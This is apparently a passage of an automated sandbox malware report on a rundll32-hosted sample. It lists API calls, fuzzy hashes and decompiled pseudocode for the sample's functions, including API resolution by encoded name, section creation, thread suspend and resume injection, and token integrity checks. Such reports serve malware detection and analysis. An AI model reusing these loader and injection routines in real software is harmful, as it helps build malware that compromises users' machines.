                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 03478D4D
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03478D6B
                                  • Part of subcall function 034733A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 03473417
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                • String ID:
                                • API String ID: 899430048-3916222277
                                • Opcode ID: 1e463f1ae869468e67b558967ee51f466d4b4717e2e031f083cfece403bbddc7
                                • Instruction ID: 96fc3411c7465af9b7e10f35155e126f0a505cc30ddeee6eff193fbbd97cc3af
                                • Opcode Fuzzy Hash: 1e463f1ae869468e67b558967ee51f466d4b4717e2e031f083cfece403bbddc7
                                • Instruction Fuzzy Hash: F7414775800619AFDB21DF69C849AEEBBF4FF18310F15821AE924AF250D774A950CFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034855E4 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 511 34855e4-3485623 call 34861ae VirtualAlloc 514 3485629-3485634 call 34861ae 511->514 515 34856f4 511->515 518 3485639-348563f 514->518 517 34856fc-34856fe 515->517 519 348570e-3485719 517->519 520 3485700-3485708 VirtualFree 517->520 521 3485641-3485645 518->521 522 3485667-3485669 518->522 520->519 521->522 523 3485647-3485665 VirtualFree VirtualAlloc 521->523 522->515 524 348566f-3485673 522->524 523->514 523->522 524->515 525 3485675-3485680 524->525 525->517 526 3485682 525->526 527 3485688-3485695 526->527 528 34856d1-34856eb 527->528 529 3485697-34856a0 lstrcmpi 527->529 528->517 531 34856ed-34856f2 528->531 529->528 530 34856a2-34856ad StrChrA 529->530 532 34856bd-34856cd 530->532 533 34856af-34856bb lstrcmpi 530->533 531->517 532->527 534 34856cf 532->534 533->528 533->532 534->517
                                APIs
                                  • Part of subcall function 034861AE: GetProcAddress.KERNEL32(?,00000318), ref: 034861D3
                                  • Part of subcall function 034861AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 034861EF
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348561D
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03485708
                                  • Part of subcall function 034861AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03486359
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 03485653
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348565F
                                • lstrcmpi.KERNEL32(?,00000000), ref: 0348569C
                                • StrChrA.SHLWAPI(?,0000002E), ref: 034856A5
                                • lstrcmpi.KERNEL32(?,00000000), ref: 034856B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                • String ID:
                                • API String ID: 3901270786-0
                                • Opcode ID: 98b8049805dbf1e3d0f9443b1d3a51f32dd403e8b4fe6e974d71e87d49e7f16e
                                • Instruction ID: d2aefa700fabab4efdfec193093835d1db977666a954a20c9957921cc2c66bf8
                                • Opcode Fuzzy Hash: 98b8049805dbf1e3d0f9443b1d3a51f32dd403e8b4fe6e974d71e87d49e7f16e
                                • Instruction Fuzzy Hash: 42318D71505301ABD321EF15DC40B2FBBE8FF86B54F15095AF988BA260D774D904CAAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343402A Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E0343402A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E034344DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E03437A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x343a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x343a348; // 0x21ad5a8
					_t18 = _t47 + 0x343b3f3; // 0x73797325
					_t68 = E03437326(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x343a348; // 0x21ad5a8
						_t19 = _t50 + 0x343b73f; // 0x55e8ce7
						_t20 = _t50 + 0x343b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E034323AA();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E034323AA();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x343a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E03436C2C(_t70);
				goto L12;
			}


















                                0x03434032
                                0x03434032
                                0x03434041
                                0x03434048
                                0x0343404d
                                0x0343415a
                                0x03434161
                                0x03434161
                                0x0343405c
                                0x03434064
                                0x03434067
                                0x0343406c
                                0x03434081
                                0x03434087
                                0x03434088
                                0x0343408b
                                0x03434091
                                0x03434094
                                0x03434099
                                0x034340a1
                                0x034340ad
                                0x034340b1
                                0x03434141
                                0x034340b7
                                0x034340b7
                                0x034340bc
                                0x034340c3
                                0x034340d7
                                0x034340db
                                0x0343412a
                                0x034340dd
                                0x034340de
                                0x034340e5
                                0x034340fe
                                0x03434100
                                0x03434104
                                0x0343410b
                                0x03434125
                                0x0343410d
                                0x03434116
                                0x0343411b
                                0x0343411b
                                0x0343410b
                                0x03434139
                                0x03434139
                                0x034340b1
                                0x03434148
                                0x03434151
                                0x03434155
                                0x00000000

                                APIs
                                  • Part of subcall function 034344DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03434046,?,?,?,?,00000000,00000000), ref: 03434503
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 03434525
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0343453B
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03434551
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03434567
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0343457D
                                • memset.NTDLL ref: 03434094
                                  • Part of subcall function 03437326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,034340AD,73797325), ref: 03437337
                                  • Part of subcall function 03437326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 03437351
                                • GetModuleHandleA.KERNEL32(4E52454B,055E8CE7,73797325), ref: 034340CA
                                • GetProcAddress.KERNEL32(00000000), ref: 034340D1
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03434139
                                  • Part of subcall function 034323AA: GetProcAddress.KERNEL32(36776F57,03437989), ref: 034323C5
                                • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 03434116
                                • CloseHandle.KERNEL32(?), ref: 0343411B
                                • GetLastError.KERNEL32(00000001), ref: 0343411F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                • String ID:
                                • API String ID: 186216982-0
                                • Opcode ID: 5045b949cbd0ebeb837cce314eb0652b23e57fc7a3e24e9b01007b70e7d9c733
                                • Instruction ID: 45e3d2be2ac49fc88a8ea0d7d48d0a391c3482f5a84a91f6bdd1bf5ea30d9452
                                • Opcode Fuzzy Hash: 5045b949cbd0ebeb837cce314eb0652b23e57fc7a3e24e9b01007b70e7d9c733
                                • Instruction Fuzzy Hash: 78317EB6800208BFDB10EFA6DC88EDEBBBCEB09304F10046AEA55FB211D7705A45CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034712E7 Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034773EB: memset.NTDLL ref: 034773F5
                                • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?), ref: 03471381
                                • SetEvent.KERNEL32(00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0347138E
                                • Sleep.KERNEL32(00000BB8,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03471399
                                • ResetEvent.KERNEL32(00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034713A0
                                • CloseHandle.KERNEL32(00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034713A7
                                • GetShellWindow.USER32 ref: 034713B2
                                • GetWindowThreadProcessId.USER32(00000000), ref: 034713B9
                                  • Part of subcall function 0348B1DC: RegCloseKey.ADVAPI32(0347E2A4), ref: 0348B25F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                • String ID:
                                • API String ID: 53838381-0
                                • Opcode ID: 69fac00db842902a951f2233aaef80ddeb3388841509cb33167dfaba22aad192
                                • Instruction ID: 98b39b84f62dd23edaa223f738b5d70b6366a29ec3cec45ff1ce68e053e39cde
                                • Opcode Fuzzy Hash: 69fac00db842902a951f2233aaef80ddeb3388841509cb33167dfaba22aad192
                                • Instruction Fuzzy Hash: A2218636200210BFD211FB679C48EAF7BEDEBDA650F15410BF509AF644DB755401C769
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03436C41 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03436C41(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x343a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E03436D63(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E03436C2C(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x03436c4e
                                0x03436c55
                                0x03436c5c
                                0x03436c70
                                0x03436c7b
                                0x03436c93
                                0x03436ca0
                                0x03436ca3
                                0x03436ca8
                                0x03436cb3
                                0x03436cb7
                                0x03436cc6
                                0x03436cca
                                0x03436ce6
                                0x03436ce6
                                0x03436cea
                                0x03436cea
                                0x03436cef
                                0x03436cf3
                                0x03436cf9
                                0x03436cfa
                                0x03436d01
                                0x03436d07

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 03436C73
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 03436C93
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03436CA3
                                • CloseHandle.KERNEL32(00000000), ref: 03436CF3
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 03436CC6
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 03436CCE
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 03436CDE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 27316c95eaff27e588dce27dcc3a77c53670283d435d340ac0f327df57b73161
                                • Instruction ID: 92a2899c59db9b4afd63116514b9ce6303be65cf5eed6bdb16b52db09050f97a
                                • Opcode Fuzzy Hash: 27316c95eaff27e588dce27dcc3a77c53670283d435d340ac0f327df57b73161
                                • Instruction Fuzzy Hash: 76213D7590020AFFEB10EF94DD84EEEBBB9FB09304F0400A6E951AB250D7759A44DF54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03431D33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E03431D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x343a348; // 0x21ad5a8
				_t1 = _t9 + 0x343b624; // 0x253d7325
				_t36 = 0;
				_t28 = E0343624E(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x55e95b1
					_t40 = E03436D63(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E034324B3(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E03436C2C(_t40);
						_t42 = E03435A07(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E03436C2C(_t36);
							_t36 = _t42;
						}
						_t43 = E03434162(_t36, _t33);
						if(_t43 != 0) {
							E03436C2C(_t36);
							_t36 = _t43;
						}
					}
					E03436C2C(_t28);
				}
				return _t36;
			}
















                                0x03431d33
                                0x03431d36
                                0x03431d37
                                0x03431d3e
                                0x03431d45
                                0x03431d4c
                                0x03431d50
                                0x03431d57
                                0x03431d5e
                                0x03431d63
                                0x03431d6b
                                0x03431d75
                                0x03431d79
                                0x03431d7d
                                0x03431d83
                                0x03431d88
                                0x03431d92
                                0x03431d98
                                0x03431d9a
                                0x03431db1
                                0x03431db5
                                0x03431db8
                                0x03431dbd
                                0x03431dbd
                                0x03431dc6
                                0x03431dca
                                0x03431dcd
                                0x03431dd2
                                0x03431dd2
                                0x03431dca
                                0x03431dd5
                                0x03431dda
                                0x03431de0

                                APIs
                                  • Part of subcall function 0343624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03431D4C,253D7325,00000000,00000000,?,75BCC740,034358D7), ref: 034362B5
                                  • Part of subcall function 0343624E: sprintf.NTDLL ref: 034362D6
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D5E
                                • lstrlen.KERNEL32(00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D66
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • strcpy.NTDLL ref: 03431D7D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 03431D88
                                  • Part of subcall function 034324B3: lstrlen.KERNEL32(00000000,00000000,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 034324C4
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431DA5
                                  • Part of subcall function 03435A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,03431DB1,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03435A11
                                  • Part of subcall function 03435A07: _snprintf.NTDLL ref: 03435A6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 0b2d623e084173e0fc28ab1ed8db4e6d695d391d9fd807a27f9474a098e385f6
                                • Instruction ID: 9b59561d345686503433121eb7b05b9dbb2f1d9d66a774c89388e343239c67e1
                                • Opcode Fuzzy Hash: 0b2d623e084173e0fc28ab1ed8db4e6d695d391d9fd807a27f9474a098e385f6
                                • Instruction Fuzzy Hash: 7511E3375002257B4A12F7B69C84CAF7AADCE8F55070A001BFD00AF204CB79DC0287A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03433F07 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03431F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055E89D0,03433F35,?,?,?,?,?,?,?,?,?,?,?,03433F35), ref: 03432047
                                  • Part of subcall function 03435634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 03435671
                                  • Part of subcall function 03435634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 034356A2
                                • SysAllocString.OLEAUT32(00000000), ref: 03433F61
                                • SysAllocString.OLEAUT32(0070006F), ref: 03433F75
                                • SysAllocString.OLEAUT32(00000000), ref: 03433F87
                                • SysFreeString.OLEAUT32(00000000), ref: 03433FEF
                                • SysFreeString.OLEAUT32(00000000), ref: 03433FFE
                                • SysFreeString.OLEAUT32(00000000), ref: 03434009
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                • String ID:
                                • API String ID: 2831207796-0
                                • Opcode ID: d5ab25e4ff5388ae3685fd256b1f9dccb0213cb4f5fc5d249d874463b05452e0
                                • Instruction ID: 0efae04b4424dc28be7debb64f8083c18979bd4ee2662295b988779ee87f0f09
                                • Opcode Fuzzy Hash: d5ab25e4ff5388ae3685fd256b1f9dccb0213cb4f5fc5d249d874463b05452e0
                                • Instruction Fuzzy Hash: F0417E36900609AFDB01EFB9C844AEFB7B9EF49210F14442AE914EF260DB71D905CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347C5C4 Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0347C5E7
                                  • Part of subcall function 0348212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0347111D,00000000), ref: 0348214D
                                  • Part of subcall function 0348212C: GetProcAddress.KERNEL32(00000000,?), ref: 03482166
                                  • Part of subcall function 0348212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0347111D,00000000), ref: 03482183
                                  • Part of subcall function 0348212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0347111D,00000000), ref: 03482194
                                  • Part of subcall function 0348212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0347111D,00000000), ref: 034821A7
                                • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0347C6A1
                                • WaitForSingleObject.KERNEL32(00000064), ref: 0347C6AF
                                • SuspendThread.KERNEL32(00000004), ref: 0347C6C2
                                  • Part of subcall function 03486DE0: memset.NTDLL ref: 034870AA
                                • ResumeThread.KERNEL32(00000004), ref: 0347C745
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                • String ID:
                                • API String ID: 2397206891-0
                                • Opcode ID: f7d647d43d80facfcc5197cc7c0bafdb5363023670501b0a86f6a2f1840ae575
                                • Instruction ID: 8d2505144c455806324f2de0bedca18de61f4ee75feef87c46014e46911063f5
                                • Opcode Fuzzy Hash: f7d647d43d80facfcc5197cc7c0bafdb5363023670501b0a86f6a2f1840ae575
                                • Instruction Fuzzy Hash: 1C41B0B5900249AFDB21EF55CCC5AEE7BB9EF04344F1444ABE914AE210CB30DE51CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03485800 Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,80000000,00000001,?,034960C0,00000018,03474B2B,?,00000201,03499A24,034999DC,-0000000C,?), ref: 03485843
                                • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,034960C0,00000018,03474B2B), ref: 034858CE
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 034858F7
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03485915
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                • String ID:
                                • API String ID: 3666628472-0
                                • Opcode ID: bc6584ce35811cd4cb6b251faca893c0f2394bd651b36dce27ca1fcb2a250ab0
                                • Instruction ID: f512215994dcb64c1d0d3c78fa80c35a72c9240068278782a02dbf02f674c2e7
                                • Opcode Fuzzy Hash: bc6584ce35811cd4cb6b251faca893c0f2394bd651b36dce27ca1fcb2a250ab0
                                • Instruction Fuzzy Hash: 2F413A74900709EFDB11EF66C884A9EBBF8FF0A310B14859BE825AF210D7749A51CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03488F62 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0347C71A,0347C71A,?,03486EFA,?,0347C71A,?,?,00000000), ref: 03488F87
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FA9
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FBF
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FD5
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FEB
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03489001
                                  • Part of subcall function 0347710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 03477167
                                  • Part of subcall function 0347710A: memset.NTDLL ref: 0347718B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 3012371009-0
                                • Opcode ID: f67da4c2862e6773dc799c5b68748b0935b897f0e5f676f603a9d66613e35ffb
                                • Instruction ID: 23c0f3f3ca44c0ed7a9c75fe071447e2dbfc082419315bfc3cb5638b2bf3fd05
                                • Opcode Fuzzy Hash: f67da4c2862e6773dc799c5b68748b0935b897f0e5f676f603a9d66613e35ffb
                                • Instruction Fuzzy Hash: F52189B0500A0AAFD721FFAAD885D6BB7ECEF16244B05452BE504DF305E774E9028B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034344DE Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034344DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E03436D63(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x343a348; // 0x21ad5a8
					_t1 = _t23 + 0x343b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x343a348; // 0x21ad5a8
					_t2 = _t26 + 0x343b761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E03436C2C(_t54);
					} else {
						_t30 =  *0x343a348; // 0x21ad5a8
						_t5 = _t30 + 0x343b74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x343a348; // 0x21ad5a8
							_t7 = _t33 + 0x343b771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
